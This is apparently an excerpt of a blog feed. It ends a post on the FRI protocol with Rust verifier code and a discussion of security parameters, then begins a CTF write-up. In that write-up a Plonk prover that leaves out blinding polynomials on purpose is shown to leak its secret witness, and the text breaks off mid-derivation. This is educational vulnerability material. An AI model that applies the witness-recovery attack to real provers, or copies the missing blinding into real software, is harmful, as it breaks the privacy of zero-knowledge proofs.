&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;fri_decommitment.layers_auth_paths_sym)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;fri_decommitment.layers_evaluations_sym)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(evaluation_point_vec)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .fold(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            true,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            |result,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                (((((k, merkle_root), auth_path), evaluation), auth_path_sym), evaluation_sym),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                evaluation_point_inv,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            )| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let domain_length = 1 &amp;lt;&amp;lt; (domain.lde_root_order - k as u32);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let layer_evaluation_index_sym = (iota + domain_length &#x2F; 2) % domain_length;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; Since we always derive the current layer from the previous layer&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; We start with the second one, skipping the first, so the previous layer is the first one&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; This is the current layer&amp;#39;s evaluation domain length.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; We need to know what the decommitment index for the current&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; layer is so we can check the Merkle paths at the right index.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; Verify opening Open(pₖ(Dₖ), −𝜐ₛ^(2ᵏ))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let auth_sym = &amp;amp;auth_path_sym.verify::&amp;lt;FriMerkleTreeBackend&amp;lt;F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    merkle_root,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layer_evaluation_index_sym,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    evaluation_sym,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; Verify opening Open(pₖ(Dₖ), 𝜐ₛ)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let auth_point =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    auth_path.verify::&amp;lt;FriMerkleTreeBackend&amp;lt;F&amp;gt;&amp;gt;(merkle_root, iota, evaluation);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let beta = &amp;amp;zetas[k];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; v is the calculated element for the co-linearity check&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                v = (&amp;amp;v + evaluation_sym) * two_inv&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    + beta * (&amp;amp;v - evaluation_sym) * two_inv * evaluation_point_inv;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; Check that the next value is given by the prover&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                if k &amp;lt; fri_decommitment.layers_evaluations.len() - 1 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let next_layer_evaluation = &amp;amp;fri_decommitment.layers_evaluations[k + 1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    result &amp;amp; (v == *next_layer_evaluation) &amp;amp; auth_point &amp;amp; auth_sym&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    result &amp;amp; (v == proof.fri_last_value) &amp;amp; auth_point &amp;amp; auth_sym&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;At each step, we have to divide by $x_0^{ 2^{ k } }$, which is the same as multiplying by its (multiplicative) inverse. We previously precomputed $x_0^{ - 1}$, and all the other inverses can be obtained by repeatedly squaring that value (lines 14 to 19). Afterward, the verifier can go through all the FriLayers. We use a fold iterator to get a constant-time implementation (lines 35 to 43): if any check fails, the proof is rejected. The verifier computes the indexes for the current layer (line 51), checks the inclusion proofs for the values (lines 59 and 65), and then computes the value of the next layer from the current one (lines 69-70). If we are not in the last layer, the verifier checks whether this computed value equals the value given in the decommitment for the next layer (lines 73-75); if it does not, verification fails. If it is the last layer, the verifier compares the computed value with the last value of the FRI protocol.&lt;&#x2F;p&gt;
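&lt;p&gt;As a sanity check on the folding relation the verifier recomputes, the following toy example works over the illustrative field $\mathbb{F}_{17}$ (none of these helpers are lambdaworks code): it folds $p_0$ with a challenge $\beta$ and confirms that $v = \frac{p_0(u) + p_0(-u)}{2} + \beta \frac{p_0(u) - p_0(-u)}{2u}$ equals $p_1(u^2)$.&lt;&#x2F;p&gt;

```rust
// Toy check of the per-layer folding relation over the illustrative prime
// field F_17 (not lambdaworks code): the verifier-side value v, rebuilt from
// the two openings p(u) and p(-u), must equal the folded polynomial at u^2.
const P: i64 = 17;

fn modp(a: i64) -> i64 { ((a % P) + P) % P }

fn mulm(a: i64, b: i64) -> i64 { modp(a * b) }

fn powm(mut b: i64, mut e: i64) -> i64 {
    let mut acc = 1;
    while e > 0 {
        if e & 1 == 1 { acc = mulm(acc, b); }
        b = mulm(b, b);
        e >>= 1;
    }
    acc
}

// Fermat inversion: a^(p - 2) mod p.
fn inv(a: i64) -> i64 { powm(modp(a), P - 2) }

// Horner evaluation of a polynomial given as coefficients [c0, c1, ...].
fn eval(coeffs: &[i64], x: i64) -> i64 {
    coeffs.iter().rev().fold(0, |acc, &c| modp(mulm(acc, x) + c))
}

// Prover-side folding: p_next(y) = p_even(y) + beta * p_odd(y).
fn fold(coeffs: &[i64], beta: i64) -> Vec<i64> {
    coeffs
        .chunks(2)
        .map(|pair| modp(pair[0] + beta * pair.get(1).copied().unwrap_or(0)))
        .collect()
}

// Verifier-side reconstruction from the openings p(u) and p(-u).
fn next_value(pu: i64, pmu: i64, beta: i64, u_inv: i64) -> i64 {
    let two_inv = inv(2);
    modp(mulm(modp(pu + pmu), two_inv) + mulm(mulm(beta, modp(pu - pmu)), mulm(two_inv, u_inv)))
}

fn main() {
    let p0 = [1, 2, 3, 4]; // p0(x) = 1 + 2x + 3x^2 + 4x^3 over F_17
    let (u, beta) = (2, 5);
    let v = next_value(eval(&p0, u), eval(&p0, modp(-u)), beta, inv(u));
    let p1 = fold(&p0, beta);
    // The reconstructed value matches the folded polynomial at u^2.
    assert_eq!(v, eval(&p1, mulm(u, u)));
    println!("v = {v} = p1(u^2)");
}
```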
&lt;h2 id=&quot;security&quot;&gt;Security&lt;&#x2F;h2&gt;
&lt;p&gt;The security of FRI depends on the size of the finite field, the security of the hash function, and the number of queries. Let’s dive into each aspect:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The finite field size should be much larger than the degree of the polynomial (which in a STARK prover is related to the trace length). To achieve 128 bits of security, the field size should be at least $2^{128}$. If the maximum trace length is $2^{30}$, the field should have at least $2^{158}$ elements. If the base field is not large enough, we can work with extensions when sampling random challenges. Some common choices are the StarkPrime 252, the prime $2^{64} - 2^{32} + 1$ (often miscalled MiniGoldilocks, used with degree 3 extension fields), BabyBear, and Mersenne 31 ($2^{31} - 1$, using a degree 6 extension).&lt;&#x2F;li&gt;
&lt;li&gt;The security provided by the hash function should be at least the security level we aim for. For hash functions such as SHA2, SHA3, Blake2, Blake3, and Poseidon, the security is simply the size of the digest (hash) divided by two. Therefore, using digests of 32 bytes (256 bits) achieves the desired security level. If we want to cover ourselves against Grover&amp;#39;s algorithm on quantum computers, we need to double the digest size to 64 bytes (512 bits), which increases the size of the proof.&lt;&#x2F;li&gt;
&lt;li&gt;The number of queries. Each query provides a certain number of bits of security, depending on the blowup factor used. The number of queries can be reduced by introducing proof of work into the prover&amp;#39;s protocol, increasing the cost of generating false proofs. There is a tradeoff between the blowup factor (which increases the prover&amp;#39;s work and memory use) and the number of queries (which increases the proof size and the verifier&amp;#39;s work).&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
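&lt;p&gt;A rough back-of-the-envelope for the query-count tradeoff: under the common conjectured-soundness estimate, each query contributes about $\log_2$ of the blowup factor in bits of security, and grinding adds its leading-zero requirement on top. This heuristic is for intuition only; concrete parameters should follow the dedicated security analyses.&lt;&#x2F;p&gt;

```rust
// Heuristic query-count estimate (conjectured soundness): each FRI query adds
// roughly log2(blowup) bits, and proof-of-work grinding adds its leading-zero
// count on top. For intuition only, not a substitute for a real analysis.
fn queries_needed(target_bits: u32, log2_blowup: u32, grinding_bits: u32) -> u32 {
    let remaining = target_bits.saturating_sub(grinding_bits);
    // Ceiling division: each query contributes log2_blowup bits.
    (remaining + log2_blowup - 1) / log2_blowup
}

fn main() {
    // 100 bits of conjectured security, blowup 2^3 = 8, 20 bits of grinding.
    println!("{} queries", queries_needed(100, 3, 20));
    // Without grinding, the same target needs more queries.
    println!("{} queries", queries_needed(100, 3, 0));
}
```

Under these assumptions, a larger blowup factor shrinks the query count (and the proof), at the price of more prover work and memory.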
&lt;p&gt;For more discussion into the security of FRI, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;582&quot;&gt;EthSTARK&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1216.pdf&quot;&gt;A summary on FRI low degree testing&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1071&quot;&gt;Fiat-Shamir security of FRI&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;FRI is a proximity test that allows us to show that a specific function is close to a low-degree polynomial, which makes it a helpful tool for building proof systems, such as STARKs or Plonky2.&lt;br &#x2F;&gt;
In this post, we covered how to code the protocol from scratch (except for the necessary Merkle trees and finite field arithmetic) and how to verify a FRI proof. The protocol consists of repeatedly folding a polynomial using random challenges and committing to the evaluations of each folded polynomial over a suitable domain using Merkle trees, until the resulting polynomial has degree zero. To show that the protocol was carried out correctly, the prover must supply evaluations of each polynomial and prove that those values are inside the Merkle trees. The protocol’s security relies on the properties of the hash function and depends on the size of the field, the size of the digest, and the number of queries used.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>First Lambda-Ingo ZK CTF: ZK challenges using LambdaWorks</title>
          <pubDate>Sun, 30 Jul 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/first-lambda-ingo-zk-ctf-zk-challenges-using-lambdaworks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/first-lambda-ingo-zk-ctf-zk-challenges-using-lambdaworks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/first-lambda-ingo-zk-ctf-zk-challenges-using-lambdaworks/">&lt;h1 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h1&gt;
&lt;p&gt;From July 14th to 16th, we organized, together with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ingonyama.com&#x2F;&quot;&gt;Ingonyama&lt;&#x2F;a&gt;, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ctf.ingonyama.com&#x2F;&quot;&gt;first Lambda-Ingo ZK capture the flag&lt;&#x2F;a&gt; (CTF), where more than 60 teams and 160 people participated. The CTF involved several challenges related to zero-knowledge proofs (using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt;) and fully-homomorphic encryption. We are thrilled with the whole experience, especially our second collaboration with Ingonyama and all the sponsors of the Lambda ZK week in Paris.&lt;&#x2F;p&gt;
&lt;p&gt;The challenges were meant as example exercises to learn how to use Lambdaworks (especially the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;starknet_stack_prover_lambdaworks&quot;&gt;Starknet Stack&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks_plonk_prover&quot;&gt;Plonk&lt;&#x2F;a&gt; provers) and get an intuition of different vulnerabilities and bugs that can arise in those systems. If you want to know more about the development of the library or wish to contribute, join our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;t.me&#x2F;+98Whlzql7Hs0MDZh&quot;&gt;telegram group&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;This post will present the challenges we submitted for the CTF and explain how they can be solved.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;plonk-challenges&quot;&gt;Plonk challenges&lt;&#x2F;h1&gt;
&lt;p&gt;There were two challenges related to Plonk and possible vulnerabilities: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.trailofbits.com&#x2F;2022&#x2F;04&#x2F;18&#x2F;the-frozen-heart-vulnerability-in-plonk&#x2F;&quot;&gt;frozen heart&lt;&#x2F;a&gt; and lack of blinding polynomials.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;obi-wan-s-search&quot;&gt;Obi-Wan’s search&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;challenge&quot;&gt;Challenge&lt;&#x2F;h3&gt;
&lt;p&gt;In his quest to stop the Sith’s menace, Obi-Wan Kenobi finds a (Sith) holocron, giving a zero-knowledge proof of the existence of the Sith’s galactic foundry (using galactic Plonk).&lt;&#x2F;p&gt;
&lt;p&gt;This place is rumored to contain several artifacts that could aid the Galactic Republic in its war efforts. The position, given by $(x , h , y)$, satisfies the equation $y = x \times h + b$.&lt;&#x2F;p&gt;
&lt;p&gt;After some study, Obi-Wan finds the values of $y$ and $b$ (which belong to Sith lore). The only problem is that, even with this knowledge, it may take him quite long to find the mysterious planet, and the situation in the Republic is desperate.&lt;&#x2F;p&gt;
&lt;p&gt;He also finds, together with the Holocron, a second item containing the SRS used to generate the proof, the prover, and a description of the circuit used.&lt;&#x2F;p&gt;
&lt;p&gt;Will he be able to find the position of the foundry before it is too late?&lt;&#x2F;p&gt;
&lt;p&gt;All the additional information is in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;obi_wan_search&quot;&gt;repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;FLAG FORMAT: XXXX……..XXXX The flag consists of the x and h concatenated and written in hex (for example, x=0x123, h=0x789, the FLAG=123789)&lt;&#x2F;p&gt;
&lt;h3 id=&quot;solution&quot;&gt;Solution&lt;&#x2F;h3&gt;
&lt;p&gt;The challenge is finding the witness variables $x$ and $h$, given the values $y$ and $b$. Normally, we would not be able to access these values, thanks to the zero-knowledge property of the Plonk system. However, in this case, the prover has a flaw: there are no blinding polynomials, and we can exploit this vulnerability to recover the unknowns.&lt;&#x2F;p&gt;
&lt;p&gt;The first round of PLONK reads as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Compute polynomials a&amp;#39;,b&amp;#39;,c&amp;#39; as the interpolation polynomials of the columns of T at the domain H.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Sample random b_1, b_2, b_3, b_4, b_5, b_6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Let&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;a := (b_1X + b_2)Z_H + a&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b := (b_3X + b_4)Z_H + b&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;c := (b_5X + b_6)Z_H + c&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Compute [a]_1, [b]_1, [c]_1 and add them to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The multiples of $Z_H$ added to $a’, b’, c’$ are called the blindings. In subsequent rounds, the polynomials $a, b, c$ are opened at the verifier’s chosen point.&lt;&#x2F;p&gt;
&lt;p&gt;The polynomials $Z_H$ are the vanishing polynomials over the interpolation domain; they are equal to zero at each point in the set $H$. Therefore, adding that polynomial (or any combination) will not change the value of the $a^\prime$, $b^\prime$, and $c^\prime$ polynomials, which must satisfy the circuit equations. However, at any other point, they will add some randomness and help conceal the values.&lt;&#x2F;p&gt;
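The vanishing trick can be checked with a toy example. This sketch is not lambdaworks code: it uses the small prime field $F_{17}$, a subgroup of order 4, and made-up names (`a_prime`, `a_blinded`) chosen only for illustration.

```rust
// Toy illustration of blinding with the vanishing polynomial
// Z_H(X) = X^4 - 1 over F_17. The subgroup H = {1, 4, 16, 13} is
// generated by g = 4 (order 4), so Z_H vanishes exactly on H.

const P: u64 = 17;

fn pow_mod(mut base: u64, mut exp: u64) -> u64 {
    let mut acc = 1;
    base %= P;
    while exp > 0 {
        if exp & 1 == 1 { acc = acc * base % P; }
        base = base * base % P;
        exp >>= 1;
    }
    acc
}

// Z_H(x) = x^4 - 1, zero on every element of H.
fn z_h(x: u64) -> u64 { (pow_mod(x, 4) + P - 1) % P }

// Some interpolated witness polynomial a'(x); here just 3x + 5.
fn a_prime(x: u64) -> u64 { (3 * x + 5) % P }

// Blinded version a(x) = (b1*x + b2) * Z_H(x) + a'(x).
fn a_blinded(x: u64, b1: u64, b2: u64) -> u64 {
    ((b1 * x + b2) % P * z_h(x) + a_prime(x)) % P
}

fn main() {
    let domain = [1u64, 4, 16, 13]; // powers of g = 4
    for &h in &domain {
        // On H the blinding term vanishes: a(h) == a'(h).
        assert_eq!(a_blinded(h, 7, 11), a_prime(h));
    }
    // Off the domain the blinding changes the value, hiding a'.
    assert_ne!(a_blinded(2, 7, 11), a_prime(2));
    println!("blinding vanishes on H and randomizes everywhere else");
}
```

Since the verifier only ever sees openings at points outside $H$, honest blindings make those openings statistically uninformative; the challenge's prover skips exactly this step.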
&lt;p&gt;By checking the code of the challenge, the participants can find the following in &lt;code&gt;circuit.rs&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Witness generator for the circuit `ASSERT y == x * h + b`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn circuit_witness(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    b: &amp;amp;FrElement,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    y: &amp;amp;FrElement,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    h: &amp;amp;FrElement,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    x: &amp;amp;FrElement,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Witness&amp;lt;FrField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z = x * h;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let w = &amp;amp;z + b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let empty = b.clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Witness {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        a: vec![&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            b.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            y.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            x.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            b.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            w.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            empty.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            empty.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            empty.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This code reveals that the prover constructs the $V$ matrix as&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;A&lt;&#x2F;th&gt;&lt;th&gt;B&lt;&#x2F;th&gt;&lt;th&gt;C&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;b&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;y&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;x&lt;&#x2F;td&gt;&lt;td&gt;h&lt;&#x2F;td&gt;&lt;td&gt;z&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;b&lt;&#x2F;td&gt;&lt;td&gt;z&lt;&#x2F;td&gt;&lt;td&gt;w&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;w&lt;&#x2F;td&gt;&lt;td&gt;y&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;td&gt;-&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Where &lt;code&gt;-&lt;&#x2F;code&gt; are empty values. The PLONK implementation of &lt;code&gt;lambdaworks-plonk&lt;&#x2F;code&gt; requires the empty values to be filled in with the first public input. So, in this case, the values &lt;code&gt;-&lt;&#x2F;code&gt; will be replaced by $b$. This can be seen directly from the code of the challenge.&lt;&#x2F;p&gt;
&lt;p&gt;Therefore, the polynomial $a’$, being the interpolation of the column &lt;code&gt;A&lt;&#x2F;code&gt; is&lt;&#x2F;p&gt;
&lt;p&gt;$$a’ = b L_1 + y L_2 + x L_3 + b L_4 + w L_5 + b L_6 + b L_7 + b L_8,$$&lt;&#x2F;p&gt;
&lt;p&gt;where $L_i$ is the $i$-th polynomial of the Lagrange basis. Also, the value $w$ is equal to $y$. That can be seen from the code and the fact that the last row of the $V$ matrix corresponds to the assertion that the actual output of the circuit is equal to the claimed output $y$.&lt;&#x2F;p&gt;
&lt;p&gt;During the proof, the verifier sends a challenge $\zeta$ and the prover opens, among other things, the polynomial $a$ at $\zeta$. Since the implementation of the challenge omits blindings, $a(\zeta) = a’ (\zeta)$, and we get&lt;&#x2F;p&gt;
